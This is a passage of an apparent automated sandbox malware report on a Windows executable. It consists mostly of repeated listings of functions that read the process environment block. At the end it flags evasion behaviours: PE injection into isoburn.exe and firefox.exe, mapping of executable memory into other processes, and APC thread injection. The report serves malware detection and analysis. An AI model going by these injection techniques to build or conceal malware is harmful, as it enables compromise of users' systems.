            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AA660 mov eax, dword ptr fs:[00000030h]2_2_015AA660
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2619 mov eax, dword ptr fs:[00000030h]2_2_015B2619
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158260B mov eax, dword ptr fs:[00000030h]2_2_0158260B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158260B mov eax, dword ptr fs:[00000030h]2_2_0158260B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158260B mov eax, dword ptr fs:[00000030h]2_2_0158260B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158260B mov eax, dword ptr fs:[00000030h]2_2_0158260B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158260B mov eax, dword ptr fs:[00000030h]2_2_0158260B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158260B mov eax, dword ptr fs:[00000030h]2_2_0158260B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158260B mov eax, dword ptr fs:[00000030h]2_2_0158260B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EE609 mov eax, dword ptr fs:[00000030h]2_2_015EE609
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A6620 mov eax, dword ptr fs:[00000030h]2_2_015A6620
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A8620 mov eax, dword ptr fs:[00000030h]2_2_015A8620
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157262C mov eax, dword ptr fs:[00000030h]2_2_0157262C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158E627 mov eax, dword ptr fs:[00000030h]2_2_0158E627
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AA6C7 mov ebx, dword ptr fs:[00000030h]2_2_015AA6C7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AA6C7 mov eax, dword ptr fs:[00000030h]2_2_015AA6C7
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EE6F2 mov eax, dword ptr fs:[00000030h]2_2_015EE6F2
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EE6F2 mov eax, dword ptr fs:[00000030h]2_2_015EE6F2
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EE6F2 mov eax, dword ptr fs:[00000030h]2_2_015EE6F2
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EE6F2 mov eax, dword ptr fs:[00000030h]2_2_015EE6F2
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F06F1 mov eax, dword ptr fs:[00000030h]2_2_015F06F1
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F06F1 mov eax, dword ptr fs:[00000030h]2_2_015F06F1
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01574690 mov eax, dword ptr fs:[00000030h]2_2_01574690
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01574690 mov eax, dword ptr fs:[00000030h]2_2_01574690
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A66B0 mov eax, dword ptr fs:[00000030h]2_2_015A66B0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AC6A6 mov eax, dword ptr fs:[00000030h]2_2_015AC6A6
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F0946 mov eax, dword ptr fs:[00000030h]2_2_015F0946
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01614978 mov eax, dword ptr fs:[00000030h]2_2_01614978
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01614978 mov eax, dword ptr fs:[00000030h]2_2_01614978
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015FC97C mov eax, dword ptr fs:[00000030h]2_2_015FC97C
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B096E mov eax, dword ptr fs:[00000030h]2_2_015B096E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B096E mov edx, dword ptr fs:[00000030h]2_2_015B096E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B096E mov eax, dword ptr fs:[00000030h]2_2_015B096E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01596962 mov eax, dword ptr fs:[00000030h]2_2_01596962
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01596962 mov eax, dword ptr fs:[00000030h]2_2_01596962
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01596962 mov eax, dword ptr fs:[00000030h]2_2_01596962
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0160892B mov eax, dword ptr fs:[00000030h]2_2_0160892B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015FC912 mov eax, dword ptr fs:[00000030h]2_2_015FC912
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01568918 mov eax, dword ptr fs:[00000030h]2_2_01568918
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01568918 mov eax, dword ptr fs:[00000030h]2_2_01568918
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EE908 mov eax, dword ptr fs:[00000030h]2_2_015EE908
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EE908 mov eax, dword ptr fs:[00000030h]2_2_015EE908
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F892A mov eax, dword ptr fs:[00000030h]2_2_015F892A
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157A9D0 mov eax, dword ptr fs:[00000030h]2_2_0157A9D0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157A9D0 mov eax, dword ptr fs:[00000030h]2_2_0157A9D0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157A9D0 mov eax, dword ptr fs:[00000030h]2_2_0157A9D0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157A9D0 mov eax, dword ptr fs:[00000030h]2_2_0157A9D0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157A9D0 mov eax, dword ptr fs:[00000030h]2_2_0157A9D0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157A9D0 mov eax, dword ptr fs:[00000030h]2_2_0157A9D0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A49D0 mov eax, dword ptr fs:[00000030h]2_2_015A49D0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_016069C0 mov eax, dword ptr fs:[00000030h]2_2_016069C0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A29F9 mov eax, dword ptr fs:[00000030h]2_2_015A29F9
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A29F9 mov eax, dword ptr fs:[00000030h]2_2_015A29F9
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0163A9D3 mov eax, dword ptr fs:[00000030h]2_2_0163A9D3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015FE9E0 mov eax, dword ptr fs:[00000030h]2_2_015FE9E0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F89B3 mov esi, dword ptr fs:[00000030h]2_2_015F89B3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F89B3 mov eax, dword ptr fs:[00000030h]2_2_015F89B3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015F89B3 mov eax, dword ptr fs:[00000030h]2_2_015F89B3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015829A0 mov eax, dword ptr fs:[00000030h]2_2_015829A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015829A0 mov eax, dword ptr fs:[00000030h]2_2_015829A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015829A0 mov eax, dword ptr fs:[00000030h]2_2_015829A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015829A0 mov eax, dword ptr fs:[00000030h]2_2_015829A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015829A0 mov eax, dword ptr fs:[00000030h]2_2_015829A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015829A0 mov eax, dword ptr fs:[00000030h]2_2_015829A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015829A0 mov eax, dword ptr fs:[00000030h]2_2_015829A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015829A0 mov eax, dword ptr fs:[00000030h]2_2_015829A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015829A0 mov eax, dword ptr fs:[00000030h]2_2_015829A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015829A0 mov eax, dword ptr fs:[00000030h]2_2_015829A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015829A0 mov eax, dword ptr fs:[00000030h]2_2_015829A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015829A0 mov eax, dword ptr fs:[00000030h]2_2_015829A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015829A0 mov eax, dword ptr fs:[00000030h]2_2_015829A0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015709AD mov eax, dword ptr fs:[00000030h]2_2_015709AD
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015709AD mov eax, dword ptr fs:[00000030h]2_2_015709AD
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01574859 mov eax, dword ptr fs:[00000030h]2_2_01574859
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01574859 mov eax, dword ptr fs:[00000030h]2_2_01574859
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A0854 mov eax, dword ptr fs:[00000030h]2_2_015A0854
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01606870 mov eax, dword ptr fs:[00000030h]2_2_01606870
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01606870 mov eax, dword ptr fs:[00000030h]2_2_01606870
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01582840 mov ecx, dword ptr fs:[00000030h]2_2_01582840
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015FE872 mov eax, dword ptr fs:[00000030h]2_2_015FE872
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015FE872 mov eax, dword ptr fs:[00000030h]2_2_015FE872
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015FC810 mov eax, dword ptr fs:[00000030h]2_2_015FC810
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161483A mov eax, dword ptr fs:[00000030h]2_2_0161483A
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161483A mov eax, dword ptr fs:[00000030h]2_2_0161483A
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AA830 mov eax, dword ptr fs:[00000030h]2_2_015AA830
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01592835 mov eax, dword ptr fs:[00000030h]2_2_01592835
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01592835 mov eax, dword ptr fs:[00000030h]2_2_01592835
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01592835 mov eax, dword ptr fs:[00000030h]2_2_01592835
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01592835 mov ecx, dword ptr fs:[00000030h]2_2_01592835
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01592835 mov eax, dword ptr fs:[00000030h]2_2_01592835
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01592835 mov eax, dword ptr fs:[00000030h]2_2_01592835
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0163A8E4 mov eax, dword ptr fs:[00000030h]2_2_0163A8E4
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159E8C0 mov eax, dword ptr fs:[00000030h]2_2_0159E8C0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AC8F9 mov eax, dword ptr fs:[00000030h]2_2_015AC8F9
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AC8F9 mov eax, dword ptr fs:[00000030h]2_2_015AC8F9
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015FC89D mov eax, dword ptr fs:[00000030h]2_2_015FC89D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01570887 mov eax, dword ptr fs:[00000030h]2_2_01570887
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01606B40 mov eax, dword ptr fs:[00000030h]2_2_01606B40
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01606B40 mov eax, dword ptr fs:[00000030h]2_2_01606B40
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0163AB40 mov eax, dword ptr fs:[00000030h]2_2_0163AB40
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01618B42 mov eax, dword ptr fs:[00000030h]2_2_01618B42
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0156CB7E mov eax, dword ptr fs:[00000030h]2_2_0156CB7E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161EB50 mov eax, dword ptr fs:[00000030h]2_2_0161EB50
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EEB1D mov eax, dword ptr fs:[00000030h]2_2_015EEB1D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EEB1D mov eax, dword ptr fs:[00000030h]2_2_015EEB1D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EEB1D mov eax, dword ptr fs:[00000030h]2_2_015EEB1D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EEB1D mov eax, dword ptr fs:[00000030h]2_2_015EEB1D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EEB1D mov eax, dword ptr fs:[00000030h]2_2_015EEB1D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EEB1D mov eax, dword ptr fs:[00000030h]2_2_015EEB1D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EEB1D mov eax, dword ptr fs:[00000030h]2_2_015EEB1D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EEB1D mov eax, dword ptr fs:[00000030h]2_2_015EEB1D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015EEB1D mov eax, dword ptr fs:[00000030h]2_2_015EEB1D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01638B28 mov eax, dword ptr fs:[00000030h]2_2_01638B28
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01638B28 mov eax, dword ptr fs:[00000030h]2_2_01638B28
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159EB20 mov eax, dword ptr fs:[00000030h]2_2_0159EB20
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159EB20 mov eax, dword ptr fs:[00000030h]2_2_0159EB20
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01590BCB mov eax, dword ptr fs:[00000030h]2_2_01590BCB
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01590BCB mov eax, dword ptr fs:[00000030h]2_2_01590BCB
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01590BCB mov eax, dword ptr fs:[00000030h]2_2_01590BCB
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01570BCD mov eax, dword ptr fs:[00000030h]2_2_01570BCD
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01570BCD mov eax, dword ptr fs:[00000030h]2_2_01570BCD
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01570BCD mov eax, dword ptr fs:[00000030h]2_2_01570BCD
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159EBFC mov eax, dword ptr fs:[00000030h]2_2_0159EBFC
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01578BF0 mov eax, dword ptr fs:[00000030h]2_2_01578BF0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01578BF0 mov eax, dword ptr fs:[00000030h]2_2_01578BF0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01578BF0 mov eax, dword ptr fs:[00000030h]2_2_01578BF0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015FCBF0 mov eax, dword ptr fs:[00000030h]2_2_015FCBF0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161EBD0 mov eax, dword ptr fs:[00000030h]2_2_0161EBD0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580BBE mov eax, dword ptr fs:[00000030h]2_2_01580BBE
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580BBE mov eax, dword ptr fs:[00000030h]2_2_01580BBE
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0161EA60 mov eax, dword ptr fs:[00000030h]2_2_0161EA60
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580A5B mov eax, dword ptr fs:[00000030h]2_2_01580A5B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01580A5B mov eax, dword ptr fs:[00000030h]2_2_01580A5B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01576A50 mov eax, dword ptr fs:[00000030h]2_2_01576A50
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01576A50 mov eax, dword ptr fs:[00000030h]2_2_01576A50
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01576A50 mov eax, dword ptr fs:[00000030h]2_2_01576A50
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01576A50 mov eax, dword ptr fs:[00000030h]2_2_01576A50
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01576A50 mov eax, dword ptr fs:[00000030h]2_2_01576A50
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01576A50 mov eax, dword ptr fs:[00000030h]2_2_01576A50
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01576A50 mov eax, dword ptr fs:[00000030h]2_2_01576A50
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015ECA72 mov eax, dword ptr fs:[00000030h]2_2_015ECA72
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015ECA72 mov eax, dword ptr fs:[00000030h]2_2_015ECA72
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015ACA6F mov eax, dword ptr fs:[00000030h]2_2_015ACA6F
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015ACA6F mov eax, dword ptr fs:[00000030h]2_2_015ACA6F
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015ACA6F mov eax, dword ptr fs:[00000030h]2_2_015ACA6F
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015FCA11 mov eax, dword ptr fs:[00000030h]2_2_015FCA11
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01594A35 mov eax, dword ptr fs:[00000030h]2_2_01594A35
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01594A35 mov eax, dword ptr fs:[00000030h]2_2_01594A35
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0159EA2E mov eax, dword ptr fs:[00000030h]2_2_0159EA2E
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015ACA24 mov eax, dword ptr fs:[00000030h]2_2_015ACA24
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01570AD0 mov eax, dword ptr fs:[00000030h]2_2_01570AD0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A4AD0 mov eax, dword ptr fs:[00000030h]2_2_015A4AD0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A4AD0 mov eax, dword ptr fs:[00000030h]2_2_015A4AD0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015C6ACC mov eax, dword ptr fs:[00000030h]2_2_015C6ACC
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015C6ACC mov eax, dword ptr fs:[00000030h]2_2_015C6ACC
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015C6ACC mov eax, dword ptr fs:[00000030h]2_2_015C6ACC
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AAAEE mov eax, dword ptr fs:[00000030h]2_2_015AAAEE
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015AAAEE mov eax, dword ptr fs:[00000030h]2_2_015AAAEE
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A8A90 mov edx, dword ptr fs:[00000030h]2_2_015A8A90
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157EA80 mov eax, dword ptr fs:[00000030h]2_2_0157EA80
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157EA80 mov eax, dword ptr fs:[00000030h]2_2_0157EA80
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157EA80 mov eax, dword ptr fs:[00000030h]2_2_0157EA80
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157EA80 mov eax, dword ptr fs:[00000030h]2_2_0157EA80
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157EA80 mov eax, dword ptr fs:[00000030h]2_2_0157EA80
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157EA80 mov eax, dword ptr fs:[00000030h]2_2_0157EA80
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157EA80 mov eax, dword ptr fs:[00000030h]2_2_0157EA80
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157EA80 mov eax, dword ptr fs:[00000030h]2_2_0157EA80
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0157EA80 mov eax, dword ptr fs:[00000030h]2_2_0157EA80
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01644A80 mov eax, dword ptr fs:[00000030h]2_2_01644A80
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01578AA0 mov eax, dword ptr fs:[00000030h]2_2_01578AA0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01578AA0 mov eax, dword ptr fs:[00000030h]2_2_01578AA0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015C6AA4 mov eax, dword ptr fs:[00000030h]2_2_015C6AA4
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01608D6B mov eax, dword ptr fs:[00000030h]2_2_01608D6B
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01570D59 mov eax, dword ptr fs:[00000030h]2_2_01570D59
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01570D59 mov eax, dword ptr fs:[00000030h]2_2_01570D59
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01570D59 mov eax, dword ptr fs:[00000030h]2_2_01570D59
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01578D59 mov eax, dword ptr fs:[00000030h]2_2_01578D59
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01578D59 mov eax, dword ptr fs:[00000030h]2_2_01578D59
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01578D59 mov eax, dword ptr fs:[00000030h]2_2_01578D59
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01578D59 mov eax, dword ptr fs:[00000030h]2_2_01578D59
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01578D59 mov eax, dword ptr fs:[00000030h]2_2_01578D59
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01566D10 mov eax, dword ptr fs:[00000030h]2_2_01566D10
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01566D10 mov eax, dword ptr fs:[00000030h]2_2_01566D10
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01566D10 mov eax, dword ptr fs:[00000030h]2_2_01566D10
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015A4D1D mov eax, dword ptr fs:[00000030h]2_2_015A4D1D
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158AD00 mov eax, dword ptr fs:[00000030h]2_2_0158AD00
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158AD00 mov eax, dword ptr fs:[00000030h]2_2_0158AD00
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0158AD00 mov eax, dword ptr fs:[00000030h]2_2_0158AD00
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01628D10 mov eax, dword ptr fs:[00000030h]2_2_01628D10
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_01628D10 mov eax, dword ptr fs:[00000030h]2_2_01628D10
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeMemory written: C:\Users\user\Desktop\WrrCV4QR2J.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6BF500000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeSection loaded: unknown target: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeSection loaded: unknown target: C:\Windows\SysWOW64\isoburn.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: unknown target: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: unknown target: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\isoburn.exeThread APC queued: target process: C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\isoburn.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6BF500000Jump to behavior
